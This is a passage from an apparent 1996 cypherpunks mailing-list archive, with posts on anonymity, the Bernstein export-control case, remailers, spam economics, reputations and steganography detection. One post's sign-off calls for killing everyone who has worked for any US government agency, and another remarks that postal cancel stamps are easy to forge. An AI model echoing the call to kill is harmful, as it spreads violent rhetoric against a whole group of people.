pipe (could be made into a bomb). There goes cash, period. See next item.)

A version for cash:

"Cash can be dangerous [illegal purchases, drugs, prostitution, tax
evasion, illegal workers, extortion, etc.] -- as can traceable money,
especially in/by repressive regimes.  Therefore I would favor allowing cash
-- with some form of traceability only under terms considerably stronger
than what are generally required for a wiretap."

(One has to presume that Dyson would probably not support Chaumian
untraceable e-cash, though I doubt she would go for the other examples.)

And so on. One can take Dyson's basic argument for why anonymity may be
dangerous at times and why it may need to be restricted, limited, or
banned, and use these arguments for a variety of other basic freedoms.
Essentially, freedom can be dangerous. The world can be dangerous. In fact,
it is.

(No, Dyson has not called for such restrictons on freedom of movement,
freedom of association, freedom to read anonymously. But her argument that
she would support anonymity if some form of traceability is built in
essentially applies, by the same logic (that it can be dangerous) to a wide
variety of other cases.)

To summarize:

"The Bill of Rights can be dangerous...."


--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 7 Sep 1996 05:30:54 +0800
To: tank <cypherpunks@toad.com
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
Message-ID: <ae55ae08020210048be5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:18 AM 9/6/96, tank wrote:
>Please forward:

>             * * * P R E S S   R E L E A S E * * *
>
>
>GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL, WITH 3100 WEBPAGES
>
>
>German internetproviders, joined in the Internet Content Taskforce
>(ICTF), started censoring the Dutch website www.xs4all.nl, containing
>3100 personal and commercial homepages. This act of censorship is
>caused by the webpage of a magazine that is banned in Germany, Radikal
>(http://www.xs4all.nl/ ~tank/radikal/).
...

Though my German friends will perhaps feel I am picking on them, this is
not so (this week Germany is in the hot seat, last week it was
Singapore....).

A Modest Proposal:

* as Germany is bent on blocking sites which carry this subversive
pamphlet, "Radikal," let us mirror it on thousands of sites around the
world.

* when the Germans went into Danmark and insisted Jews wear badges,
ordinary citizens (and the Danish Royal Family, as I recall) also took to
wearing these Star of David badges.

* wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now
attached to so many pages were to be joined by a "Star of David"? This Star
of David symbol could mean "We support freedom to read, and our site
contains the "Radikal" publication which Germans are forbidden to access."

(I know nothing of how such symbolic campaigns are actually launched and
managed, so I'm suggesting the hint of an idea. I do think mirroring the
banned publication (_any_ banned publication, by _any_ government) on as
many sites as possible is a Good Idea.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 7 Sep 1996 02:18:32 +0800
To: gnu@toad.com
Subject: Sep 20th SF C'punks meeting: ITAR on trial
Message-ID: <199609061051.DAA05601@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


We're having another "Cypherpunks Dress-Up Day" on Friday, September
20th.  Meet at the Federal Building in San Francisco, 450 Golden Gate
Avenue, at 11:45AM, in high-quality business drag.  [There will also
be a regular Saturday meeting this month, on Sep 14.]

It's been eleven months to the day since our first hearings in Dan
Bernstein's lawsuit against the NSA and State Department.  At this
hearing, starting at High Noon, we hope to convince Judge Marilyn Hall
Patel to declare that the ITAR (export regulations) and AECA (export
law) are unconstitutional.  We are asking her to order the State
Department to immediately stop enforcing them with respect to
cryptographic software.

Simultaneously, the government is asking her to declare that their
actions have been completely legal and Constitutional, and to throw
out our lawsuit.

Judge Patel has asked both sides to fully explore all the legal issues
in the case for this hearing, leaving aside any unresolved factual
questions (like exactly how many people have had their exports
denied).  She plans to decide the questions:

	*  Should the government's actions be examined under the "strict
	   scrutiny" appropriate when they attempt to restrict speech,
	   or under a looser "O'Brien" test that applies when the
	   government seeks to restrict conduct and only incidentally
	   restricts speech?
	*  Is the ITAR Scheme a prior restraint on speech?
	*  Does the ITAR Scheme impermissibly punish speech after the fact?
	*  Is the ITAR Scheme too vague to constitutionally regulate speech?
	*  Is the ITAR Scheme so broadly worded that it unconstitutionally
	   limits speech protected by the First Amendment?
	*  Were the government's actions as applied to Dan Bernstein
	   unconstitutional restrictions on his First Amendment rights?

It's possible, but unlikely, that the judge will decide some of this
then-and-there.  Instead, we will get some insights into how she is
leaning, based on her questions and comments.  Her written decision
will come out some weeks or months later.  She then plans to certify
the case for immediate appeal to a higher court (the Ninth Circuit,
also here in San Francisco), to confirm or deny her legal analysis.
>From there it will probably go to the Supreme Court.

Watch the wheels of justice grind!  Meet the intrepid lawyers who are
working hard to protect our rights!  Shake hands with one or more NSA
representatives specially flown in for the occasion!  Meet some
journalists and be quoted talking about crypto freedom!

We will follow the hearing with a group lunch at Max's Opera Plaza, a
block away at Van Ness Avenue and Golden Gate Avenue.

As background, Dan Bernstein, ex-grad-student from UC Berkeley, is
suing the State Department, NSA, and other agencies, with help from
the EFF.  These agencies restrained Dan's ability to publish a paper,
as well as source code, for the crypto algorithm that he invented.  We
claim that their procedures, regulations, and laws are not only
unconstitutional as applied to Dan, but in general.  Full background
and details on the case, including all of our legal papers (and most
of the government's as well), are in the EFF Web archives at:
    http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case.

Like Phil Karn's and Peter Junger's cases, this lawsuit really has the
potential to outlaw the whole NSA crypto export scam.  We intend to
make your right to publish and export crypto software as well-
protected by the courts as your right to publish and export books.  It
will probably take more years, and an eventual Supreme Court decision,
to make it stick.  But this is the hearing at which we plan to
convince our judge that these laws really are unconstitutional.  Her
order restoring our legal right to publish crypto source code could
come out by Christmas!

Please make a positive impression on the judge.  Show her -- by
showing up -- that this case matters to more people than just the
plaintiff and defendant.  Demonstrate that her decision will make a
difference to society.  That the public and the press are watching,
and really do care that she handles the issue well.

We'll have to be quiet and orderly while we're in the courthouse.
There will be no questions from the audience (that's us), and no
photography, but the session will be tape-recorded and transcribed,
and you can take notes if you like.  The lobby guards will want to
hold onto guns, "munitions", and even small pocketknives, before
they'll let you go upstairs to the courtrooms.

So, here's your excuse to put on a nice costume, take an early lunch,
and pay a call on the inner sanctum of our civil rights.  See you there!

	John Gilmore

PS:  If you can't come, you can still contribute.  Join EFF's Legal
Defense Fund; see http://www.eff.org/pub/Alerts/cyberlegal_fund_eff.announce.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 6 Sep 1996 21:16:07 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Race Bit: C
In-Reply-To: <199609060330.UAA27245@mail.pacifier.com>
Message-ID: <Pine.SUN.3.95.960906050438.20139G-100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Sep 1996, jim bell wrote:

> The way I see it, the status quo doesn't come "pre-justified":  It needs 
> just as much a defense as any other proposal.  Its main advantage is that it 
> tends to be more understood that most hypotheticals, because it's been 

	More understood, and just more accepted, because alternatives
	are hard to conceive, and even harder to popularize, without
	lots of red liquid running in the streets?

        xan

        jonathon
        grafolog@netcom.com




	On second thoughts, let's just terminate
	with extreme prejudice, each and every individual
	who has worked in any capacity for any part of any
	government agency in the us -- regardless of whether it
	was federal, state or local, and regardless of whether 
	they were president, janitor, or clerk.


	All people in the employ of government agencies are death-dealers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 7 Sep 1996 07:58:50 +0800
To: cypherpunks@toad.com
Subject: Junk Phone Calls, Metered Usage, and Cellphones
Message-ID: <ae55ca940302100440b2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:08 PM 9/6/96, stewarts@ix.netcom.com wrote:

>is done because of the Great Drug Hysteria, but I suspect part of it
>is that pay phone companies don't make money receiving calls,
>so they don't want to tie up their phones doing that; perhaps if
>they charged money to receive calls as well as initiate them,
>they'd be willing to receive calls?

I am about to start worrying about "junk phone calls" more so than I have
been. I just bit the bullet and bought a digital cellular phone, with a
nifty rate plan called Digital Flex: I get unlimited free airtime from 7
p.m. to 7 a.m. weekdays, and unlimited free airtime all weekend. From south
of Salinas to north of Santa Rosa and as far east as the Central Valley. In
other words, the entire Bay Area and outlying communities. I can send and
receive calls over this entire region, from anywhere in the region (of
course), without any charges.

The downside is that calls _from_ or _to_ my phone during "business" hours
are charged 42 cents a minute, airtime (tying up a channel and all), plus
whatever other fees may be applicable at each end. Thus, every "junk call"
I get trying to get me to buy aluminum siding, or to vote Democratic, or to
switch my long-distance carrier (!), costs me a minimum of 42 cents,
depending on how fast I can realize who they are and get rid of them ("Let
me forward you to Jim Bell's AP hotline...").

Needless to say, my cellular number is only going out to a handful of
folks, and with recommendations that they not call me during business hours
unless its urgent.

I believe this kind of pricing model is likely to be common. We can debate
til the cows come home whether flat rate pricing makes sense, for ISPs, for
cellphones, for other things.

Relevance to Crypto? The "junk e-mai" issue, calls for regulations (which
I'm against), technological solutions (Caller ID lets users decided to
accept a call or not....same idea could be used with e-mail, a la Hal
Finney's "You have a message of size X from size Y entitled Z" proposal for
positve acceptance of remailed messages), and the value of True Names (and
True Numbers).

I'll be real pissed if my new cellphone number ends up in the hands of mass
marketers, given that I don't plan to give it out to merchants, to
organizations, etc.

(I'm probably inviting malicious use by one of my enemies here on this
list...there may be ways I don't yet grok to "look up" cellphone user
numbers. I can then get hit with denial-of-service attack just by having
this 42 cents a call situation. I hope no one is this malicious.)

P.S. The phone is a Motorola Micro Digital Lite, a little bugger with a
zillion features. It can vibrate silently instead of ringing (phone sex?),
it can store 100 alphanumeric name/number combinations, it even has a data
port for use with a modem (probably a special modem, and certainly a chore
to set all the battery-powered stuff up properly...I'll report on it if it
works). The cost was about $200 for the phone, after the rebates,
kickbacks, etc., and after "sales tax on the pre-kickback price" was added
back in (California has a tax collection scam where sales tax is assessed
against the "real" price of some good or service....imagine the
possibilities if this is extended to cover other such areas). The "Digital
Flex" plan from Cellular One is $20/mo for the basic plan, and then $15/mo
on top of that for the unlimited evenings and weekends use. (This could
easily save me the amount I often spend in a month just yakking with
friends and girlfriends who live over the hill in the Valley.)

These rates have really come down a lot. The unlimited calls is what sold me.

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 7 Sep 1996 01:51:24 +0800
To: cypherpunks@toad.com
Subject: U.K. cyberporn fearstorm, Singapore attacks Julf, from HotWired
Message-ID: <Pine.3.89.9609060540.A24990-0100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Sgt. Toby Tyler is actually a bit of a cypherpunk. He told me he 
"absolutely" supports anonymous remailers -- repressive governments in 
Asia and all that. He just doesn't think that many people will use 'em.

-Declan


---------- Forwarded message ----------
Date: Fri, 6 Sep 1996 05:55:26 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: U.K. cyberporn fearstorm, Singapore attacks Julf, from HotWired

[Also in today's Netizen on HotWired is a report from India on their 
Net-regulations and Brock in Muckraker on the White House's new "Key 
Recovery Initiative" anti-crypto legislation. Check out 
http://www.hotwired.com/ --Declan]

**********

http://www.hotwired.com/netizen/96/36/index4a.html

HotWired, The Netizen   
6-8 Sept 96

   Finnish Line
   by Declan McCullagh
   Washington, DC, 5 September

   Call it a cyberporn fear-storm: Splashed across the front page of
   the 25 August issue of the London Observer was a hysterical report
   naming Finnish pseudonymous remailer operator Julf Helsingius as the
   "man US police-experts charge with being at the hub of 90 percent of
   the child pornography on the Internet."
   
   The report continued: "'Somewhere between 75 and 90 percent of all the
   child pornography I see is supplied through this remailer,' said Toby
   Tyler of the FBI." That was enough to make Helsingius - already
   reeling under threats from the Singapore government and repeated legal
   attacks from the always-litigious Church of Scientology - pull the
   plug on his anon.penet.fi site last Friday.
   
   But in trying to milk the story, the Observer went too far. The "FBI
   investigator" the paper cited as their only support for the
   accusations doesn't exist.
   
   In truth, Tyler is a sergeant in California's San Bernardino sheriff's
   office, and he says the Observer intentionally misrepresented his
   identity and his statements.
   
   Tyler says "there's very little of the story I agree with," and the
   Observer took a conversation he had with a reporter "and selectively
   chose words that would mean what they wanted."

[...]

   Helsingius blames the Observer for scaremongering. "It was quite clear
   that they were trying to create a story where there was none ... I
   quite clearly outlined why my server wasn't transmitting child porn,"
   Helsingius said. "I stated that the Finnish police had investigated
   and found that it wasn't. These comments were ignored. They wanted to
   make a story so they made things up."

[...]
   
   Still, a malicious front-page splash in the Observer isn't the full
   extent of Helsingius's troubles. Now he's also up against the
   Singapore government, which has demanded the identity of one of the
   users in his half-million-person database...
   
   The unknown user, who has the email address an511172@anon.penet.fi,
   posted hundreds of messages to the soc.culture.singapore newsgroup
   under the name of "Lee Kwan Yew," the retired prime minister of
   Singapore. The messages are short and unimaginative, yet apparently
   are just enough to piss off the thin-skinned Singaporean officials.
   One post reads: "We are small and vulnerable. Without regulations, we
   will be like Hong Kong, oops, fuck, bad example, they are actually
   doing quite all right. - SM Lee Kwan Yew, Republic of Singapore."
   
   Now that a Finnish court recently ruled that the remailer's database
   could be breached in a Scientology case, Helsingius says he's not sure
   what might happen. In the meantime, he's stuck somewhere between a
   sensationalist British newspaper and a Singaporean government bent on
   silencing opposition.

[...]

Links from the article:

   Linkname: hysterical report in London Observer
   Filename: http://www.scallywag.com/obtext.htm

   Linkname: Singapore banning Web pages
   Filename: http://www.eff.org/~declan/global/sg/

   Linkname: hundreds of messages pseudonymously posted
   Filename: http://www.eff.org/~declan/global/sg/anon.posts.090596.txt

###





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 7 Sep 1996 01:37:08 +0800
To: cypherpunks@toad.com
Subject: BAY AREA PARTY REMINDER
Message-ID: <Pine.SUN.3.91.960906063913.28402A-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

We are at one week and counting until my Second Occasional 
Anarcho-Dilettante costume party.  If you would like to attend
please RSVP as soon as possible.  If you did not get or keep the 
original invitation, let me know and I'll send you another copy.

In addition to Cypherpunks and Extropians, there will be gun
nuts, a contingent of Burning Man survivors and some total 
strangers.  It will be one hell of a party.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zaphoid _d00l <zaphoid@solgate.com>
Date: Fri, 6 Sep 1996 22:41:22 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2.2.32.19960906120442.006a74b0@solgate.com>
MIME-Version: 1.0
Content-Type: text/plain


desubscribe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sat, 7 Sep 1996 01:55:14 +0800
To: cypherpunks@toad.com
Subject: CFP 97: Burlingame, CA
Message-ID: <v01540b05ae55ea681278@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Forwadred from RISKS:

------------------------------

Date: Tue, 3 Sep 1996 12:37:14 -0700 (PDT)
From: Bruce R Koball <bkoball>
Subject: 7th Computers, Freedom, and Privacy

   THE SEVENTH CONFERENCE ON COMPUTERS, FREEDOM, AND PRIVACY
                Call for Participation
        San Francisco Airport Hyatt Regency Hotel
                Burlingame, California
                   11-14 March 1997

CFP97: Commerce & Community will be sponsored by the Association for
Computing Machinery SIGCOM and SIGSAC. The host institutions will be
Stanford University and the University of California at Berkeley.
Co-sponsors and cooperating organizations include the ACM SIGCAS, the
Electronic Frontier Foundation, the Center for Democracy and Technology, the
Electronic Privacy Information Center, and the WELL.

CFP97: Commerce & Community is the latest in a series of annual conferences
assembling a diverse group of experts and advocates from the domains of
technology, business, government, and academia to explore the evolution of
information and communication technologies and public policy, and its
effects on freedom and privacy in the United States and throughout the
world.

Past CFP sessions have discussed, debated -- and often anticipated -- issues
of great social import.  In this tradition, CFP97: Commerce & Community will
examine the social and policy questions posed by:

* the growth of electronic communities;
* electronic commerce and the commercialization of cyberspace;
* the problems of legal and regulatory control of the Net;
* the interests of privacy and property in the electronic domain;
* high-tech law enforcement and security concerns.

The CFP97 Program Committee invites your suggestions for presentations on
these or other important issues at the nexus of technology, business, public
policy, freedom, and privacy.

Proposals may be for individual talks, panel discussions, debates, moot
courts, moderated, interactive sessions or other formats.  Each proposal
should be accompanied by a one-page statement describing the topic and
format.  Descriptions of multi-person presentations should include a list of
proposed participants and session chair.  Proposals should be sent by e-mail
to cfp97@cfp.org. If necessary, typewritten proposals may be sent to:
CFP'97, 2210 Sixth Street, Berkeley, CA 94710.

Please submit your proposal as soon as possible.  The deadline for
submissions is 1 October 1996.  (Please note that we have extended our
deadline for submissions)

For more information on the Computers, Freedom and Privacy Conferences,
as well as up-to-date announcements on CFP'97, please visit our Web
page at:   http://www.cfp.org

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 6 Sep 1996 23:27:01 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: 16oz packages
In-Reply-To: <199609051928.OAA19142@bigeasy.com>
Message-ID: <199609061201.IAA04873@nrk.com>
MIME-Version: 1.0
Content-Type: text



> One is now instructed to take these packages to a post-office mail 
> clerk for mailing.
> 
> (Of course it's unclear just what would be done if a package 
> weighing over that magical 16ozs was left in a mailbox)

They get sent back.

Was in line @ USPS. Guy showed up with 40-odd Priority Mail
Packages that had come back. Clerk stamped each one & off they went.

1) It was obvious from conversation the customer was a local.

2) The hand cancel stamp is TRIVIAL to forge. After all, until now,
who has WANTED to falsely zero-out the value of her stamps?


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgruber@nz1.netzone.com
Date: Wed, 11 Sep 1996 23:50:49 +0800
To: username@toad.com
Subject: Factory Memory
Message-ID: <199609102056.NAA28544@goodguy.goodnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Factory memory update...

As you know, the new software applications are very memory hungry.  
As a direct source for memory products we can make your memory 
upgrade affordable.  These are the latest prices for popular memory 
72 pin SIMM memory boards:
                      4MB   $19.99 US
                      8MB   $39.99 US
                    16MB   $89.99 US
                    32MB   $219.00 US

Many more styles and sizes are available on our website - 
www.gruber.com, or call us at (602) 863-2655 or fax at (602) 257-4313
We also offer a tool free number at 800 658-5883 (USA only).

Thank you,
Pete
Pete Gruber
pgruber@netzone.com
(602) 863-2655 Voice
(602) 257-4313 Fax




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 7 Sep 1996 03:01:59 +0800
To: cypherpunks@toad.com
Subject: Re: 16oz packages
In-Reply-To: <199609061201.IAA04873@nrk.com>
Message-ID: <199609061523.IAA29080@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher <wb8foz@nrk.com> writes:

> > One is now instructed to take these packages to a post-office mail 
> > clerk for mailing.
> > 
> > (Of course it's unclear just what would be done if a package 
> > weighing over that magical 16ozs was left in a mailbox)
> 
> They get sent back.

What happens if there is no return address, or the return address is
in another state?  Do they throw out the package?  Do they open it?
Do they have a bomb squad destroy it (could get expensive if a lot of
16 oz packages are incorrectly mailed).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sat, 7 Sep 1996 03:04:07 +0800
To: cypherpunks@toad.com
Subject: Test...sorry about this
Message-ID: <Pine.3.89.9609060835.A11235-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


I'm just posting this to see if there's something wrong with my mail 
filter - it dumped a ton of messages from this list over the night, and 
I'm trying to figure out why the !@%$# it did that.  Sorry for the 
interruption.

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pete Gruber" <pgruber@netzone.com>
Date: Sat, 7 Sep 1996 07:48:50 +0800
To: username@nz1.netzone.com
Subject: Factory Memory
Message-ID: <199609061547.IAA01621@nz1.netzone.com>
MIME-Version: 1.0
Content-Type: text/plain


Memory prices have finally stabilized after serious price drops since 

the beginning of this year.  With Christmas demand high for 
electronic gadgets, memory supply is dwindling and higher prices are 
sure to follow.

Now is a good time to upgrade memory to satisfy those memory hungry 
software packages.  We are able to offer memory 72 pin, 70ns 
non-parity, SIMM memory boards at:

    32 mb=$221      16 mb=$89.99      8 mb=$39.99      4 mb=$19.99

MANY more styles, sizes, speeds, are available.  Check out our 
website - http://www.gruber.com for a complete list, or call us at 
800 
658-5883 Toll free or (602) 863-2655 for more details.

Thank you

Jillene Barr
Gruber Industries Incorporated




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 7 Sep 1996 04:05:37 +0800
To: "Donald E. Eastlake 3rd" <cypherpunks@toad.com
Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd)
Message-ID: <199609061607.JAA00614@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:46 AM 9/6/96 -0400, Donald E. Eastlake 3rd wrote:
>Suggest you look at draft-eastlake-internet-payment-*.txt in the
>IETF shadow directories.  I don't think any one step will solve all
>our spam problems but I wouldn't mind spending, say, 5 cents for each 
>real piece of mail I sent outside my company and if end machines charged 
>5 cents per piece of ouside mail received, I think spamming would be 
>crippled.  (Note that with bad guy lists, you could collect the money and 
>then just throw away the mail.)

Assuming we all agree that we're moving from a paper-based mail system to 
email, it is logical that "junk mail" will move as well.  As I recall, 
statistics show that the average cost of a piece of junk mail is about $1 or 
so, including postage, printing, etc.  It occurred to me a while back (and 
this proposal appears to be at least approximated by other proposals around 
here) that since companies are already saving a dollar, they should use some 
of those savings to "bribe" Internet-users into reading those (commercial) 
messages. 

Don't bother with all the details on how to verify this, just include 
digital cash along with the message, to be credited automatically to the 
recipient.

Assuming the average Internet user already pays about $15 per month for 
access, he would only have to receive 2 emails a day which pay him 25 cents 
per, to pay for this service.  At that point, his Internet access would be 
free, at least somewhat analogous to free TV which is paid for by commercials.

Everybody's ahead, except for the postman, the printer, etc.






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 7 Sep 1996 03:28:12 +0800
To: pstira@escape.com
Subject: Re: Anonymous phone calls (was: What is the EFF doing exactly?)
Message-ID: <199609061607.JAA00624@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 AM 9/6/96 EST, jbugden@smtplink.alis.ca wrote:
>There is another spin possible on the reasons for replacement of pay phones with
>credit card phones. In Canada all new credit card phones are also able to take
>phone cards (which are anonymous).

Don't be too sure about the "anonymity" of these cards.  You don't have to 
give your name when you buy or use them, but assuming a large number of 
phone calls (to, from different locations) can be associated together after 
the fact, your name can probably be fairly easily obtained.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Sat, 7 Sep 1996 01:50:56 +0800
To: gregburk@netcom.com (Greg Burk)
Subject: Re: Reputations
Message-ID: <199609061407.JAA23700@bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


> I don't see how there can be such a thing as negative reputation
> capital. Wouldn't that mean B believes the opposite of what A says? If
> you anti-believed someone in a consistent manner, couldn't they exploit
> that?

Of course they could exploit that.  But you're not "anti-believing" 
the information an untrusted party is passing.  Rather, you are not 
acting on their information in *any* fashion.  You're ignoring them.  
In the case of the common killfile, you may not even know that 
they're talking at you.  

> Also, you are speaking only of 1-to-1 reputation-relationships. But that
> is inefficient. The mere fact of having to evaluate each person's
> reputation yourself is significant work.

It is significant work.  How much work depends on how valuable the 
transactions you are considering are to you.

It's not as if the notion of reputation capital doesn't have precedent. 
When I make a purchase for my business, I do quite a bit of checking 
on the background of individuals and businesses I am purchasing from. 
The amount of reference work I do depends on how much I intend 
to spend.  Furthermore, I am much more apt to do business with 
individuals who have been referred by other trusted parties (a 
transfer of raputation capital).

Also my initial investment with a relative unknown is usually small.  
The repuatation capital of both parties increases relative to one 
another as a relationship is continued.
  
> On the other hand, you could talk about the transmission of reputations.
[..snip..]
> For instance, when a certain infamously-low-reputation (deservedly so)
> individual recently joined the cypherpunk lists, others who had endured
> him in the past tried to relay their impressions of him. It proved very
> difficult to convey, and they were somewhat attacked for their efforts
> and not entirely believed.

You seem to view the notion repuatation capital as absolute.  It is 
relative to each user of it.  The unnamed you are referring to did 
indeed come in with quite a bit of negative repuatation capital 
attached to his name.  While I might regard the opinions of others on 
the list as being valuable, I chose to see for myself if the unnamed 
person warranted his bad repuation. 

> In other words, he *could not* spend down to 0, despite years of
> unflagging effort.

In other words, I decide if an when he has "spent down to zero" with 
me -- even if we never directly communicate.
 
 
> Now, suppose J. Anonymous Gourmand spams all of Usenet, and millions of
> people who have never heard of J. Anonymous Gourmand before read a
> plausible but false account of the disgustingness of McDonald's food.
> Perhaps the same detailed study, just fake. (Not to intertangle this
> with other issues, let's further suppose that Ms. Gourmand sneaks in
> underneath spam-watcher's radar, and cleverly appears to be on topic in
> every group.)
>  
> Nothing about her reputation has changed, but surely when her claim is
> read by millions it will hurt McDonalds a non-trivial amount.

Why?  That depends on the sophistication of millions of Usenet 
readers (heh). 

I think your extension of this example is not useful.  It's 
impossible not to "intermingle it with other issues" such as the 
substance of the message itself, the ability to verify any factual 
information, etc. etc. ad nauseam.  

Reputation is but one factor in many and has a mostly negative effect 
if J. Anonymous Goumand is indeed anonymous.  Change J. Anonymous 
Gourmand to say, C. Everett Koop, and you can envision a more 
tangible example of reputation capital in action.


me
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joshua E. Hill" <jehill@gauss.elee.calpoly.edu>
Date: Sat, 7 Sep 1996 05:06:09 +0800
To: cypherpunks@toad.com
Subject: Re: Steganography -- Tell Tale Signs?
In-Reply-To: <Pine.LNX.3.95.960905184816.709A-100000@gak>
Message-ID: <199609061702.KAA02054@hyperion.boxes.org>
MIME-Version: 1.0
Content-Type: text/plain


> 1) If I hide some PGP encrypted data in a
> gif, jpg or wav file will there be any tell tale
> signs to the naked eye of an expert? If yes,
> what are they?
naked eye: no... but if an expert is looking (for any reason) they would
probably check out the low order bits, regardless... and although the
actual message appears random, PGP has some headers which are _defiantly_
not random... In fact, they are trivial to check for.  Look for Stealth-
PGP (A separate product for now... to be integrated with PGP 3.0)
The idea behind Stealth-PGP is that there are no headers... so the entire
data stream is random...

> 3) Are there any tools at the moment
> to expose (not crack) the hidden encrypted
> data? If none. are there tools in development?
sure enough... There are several rather accepted stego formats...
If they can use one of the known forms of stego, and extract a PGP-looking
message, you are going to be hard pressed to "plausibly deny" anything.

If you _do_ use Stealth-PGP (or some other raw encryption method), the
low ordered bits would appear to be random... Now, I'm not certain about
this, but I doubt that the low order bits of any given regular file are
really as random as a good crypto algorithm is.  I'd imagine that there
are ways of statisticly analyzing the low order bits of a file, and
seeing if they're random... If they are completely random, then there
is probably something hidden there... and if they are completely ordered,
then there is probably something hidden there... In the "next generation"
stego tools, there will probably be options to hide data in noise that
looks similar to the native noise of the medium... a sort of subliminal
channel in the noise (more so than regular stego).  Until then you'll 
have to rely on "gee... what do you mean 'completely random'" ;-)

			Joshua

-----------------------------Joshua E. Hill-----------------------------
|                    LAWS OF COMPUTER PROGRAMMING:                     |
|    X. Adding manpower to a late software project makes it later.     |
-------jehill@<gauss.elee|galaxy.csc|w6bhz|tuba.aix>.calpoly.edu--------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
